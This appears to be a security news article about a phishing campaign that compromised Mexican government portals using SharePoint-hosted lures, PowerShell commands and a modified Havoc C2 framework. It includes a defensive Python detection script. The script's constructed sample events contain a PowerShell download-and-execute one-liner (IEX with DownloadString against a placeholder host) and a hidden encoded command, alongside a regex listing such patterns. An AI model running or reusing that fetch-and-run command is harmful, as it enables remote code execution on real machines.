
A new sophisticated and dangerous phishing campaign has compromised at least 17 portals of Mexican government agencies that handle critical and sensitive information. Víctor Ruiz, founder of SILIKN, warns that the integration of legitimate Microsoft services in this campaign makes it highly sophisticated and difficult to detect. Ruiz emphasizes that, in addition to basic anti-phishing measures, it is essential for government agencies to alert their employees about emails requesting the execution of commands in PowerShell or in a terminal, as this may be a sign of an attack.
Among the vulnerable institutions are the Mexican Institute of Industrial Property (IMPI), the Rewards Program of the Attorney General's Office, the Information Portfolio of the National Banking and Securities Commission (CNBV), as well as several state systems in San Luis Potosí. Ruiz recommends that these institutions conduct thorough reviews of their systems, strengthen the protection of their Microsoft 365 accounts, and train their employees to identify suspicious emails and fraudulent procedures.
The phishing campaign uses malicious documents hosted in Microsoft SharePoint to trick users and take control of their systems. Víctor Ruiz explains that the attackers abuse the Microsoft Graph API within SharePoint to disguise command and control (C2) communications as legitimate Microsoft 365 traffic, which makes them difficult to distinguish from normal use. The attack begins with a phishing email enticing the recipient to open an attachment named “Documents.html” and then execute a PowerShell command; that command launches the malware and compromises the system.
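The chain described above (a user-facing application spawning PowerShell, a hidden or encoded command line, and PowerShell itself talking to Graph or SharePoint) gives defenders three concrete telemetry signals. The following Python is an added illustration written for this article, not code from SILIKN, Microsoft, or the Havoc project. It assumes Sysmon-style process-creation and network-connection fields (parent, image, command line, destination host); all sample events are constructed, and the encoded payload and hostnames are placeholders, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# --- Constructed sample telemetry (not from the article). The field names
# mirror Sysmon Event ID 1 (process create) and Event ID 3 (network connect).
PROCESS_EVENTS = [
    # Benign: an operator running a script from an interactive desktop session
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    # Suspicious: PowerShell launched from the mail client with a hidden,
    # encoded command, matching the "open the attachment, run this" lure
    {"id": 2, "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand UExBQ0VIT0xERVI="},
    # Suspicious: browser-spawned PowerShell fetching and evaluating remote content
    {"id": 3, "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/x')\""},
    # Benign: an Office application started normally
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n"},
]

NETWORK_EVENTS = [
    # Benign: a browser reaching Graph, as ordinary Microsoft 365 use does
    {"id": 10, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "graph.microsoft.com", "dest_port": 443},
    # Suspicious: PowerShell itself beaconing to Graph / SharePoint, the channel
    # the article says the C2 traffic hides in
    {"id": 11, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_host": "graph.microsoft.com", "dest_port": 443},
    {"id": 12, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_host": "contoso.sharepoint.com", "dest_port": 443},
]

# Applications a user interacts with directly; a shell under them is unusual.
USER_FACING_PARENTS = ("outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "winword.exe", "excel.exe")
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe")
# Command-line features typical of pasted one-liners rather than scheduled scripts.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b"
    r"|-ep\s+bypass|-executionpolicy\s+bypass|\bIEX\b|Invoke-Expression"
    r"|DownloadString|FromBase64String)")


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_m365_host(host: str) -> bool:
    host = host.lower()
    return host == "graph.microsoft.com" or host.endswith(".sharepoint.com")


def check_process(ev: dict) -> list[Finding]:
    """Flag shells spawned by user-facing apps and suspicious shell arguments."""
    findings = []
    image, parent = _basename(ev["image"]), _basename(ev["parent"])
    if image in SHELL_IMAGES and parent in USER_FACING_PARENTS:
        findings.append(Finding(ev["id"], "shell-from-user-app", f"{parent} spawned {image}"))
    if image in SHELL_IMAGES:
        m = SUSPICIOUS_ARGS.search(ev["cmdline"])
        if m:
            findings.append(Finding(ev["id"], "suspicious-shell-args", m.group(0)))
    return findings


def check_network(ev: dict) -> list[Finding]:
    """Flag a shell process (not a browser or Office app) talking to Graph/SharePoint."""
    if _basename(ev["image"]) in SHELL_IMAGES and _is_m365_host(ev["dest_host"]):
        return [Finding(ev["id"], "shell-to-m365-api", ev["dest_host"])]
    return []


def run_detections(process_events=PROCESS_EVENTS, network_events=NETWORK_EVENTS) -> list[Finding]:
    findings = []
    for ev in process_events:
        findings.extend(check_process(ev))
    for ev in network_events:
        findings.extend(check_network(ev))
    return findings


if __name__ == "__main__":
    for f in run_detections():
        print(f"event {f.event_id}: {f.rule} ({f.detail})")
```

The network rule deliberately keys on the originating process rather than the destination: blocking graph.microsoft.com is not an option for a Microsoft 365 tenant, but a shell interpreter is rarely a legitimate Graph client on a user workstation, so that pairing is the signal to alert on.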
The expert warns that cybercriminals use a powerful open-source command and control framework called Havoc to gain full control of the compromised system. This malware is a modified version of Havoc, designed to hide within real Microsoft tools and evade traditional defenses. It is essential for government institutions to strengthen their security measures and train their personnel to protect themselves from this increasingly sophisticated and dangerous threat.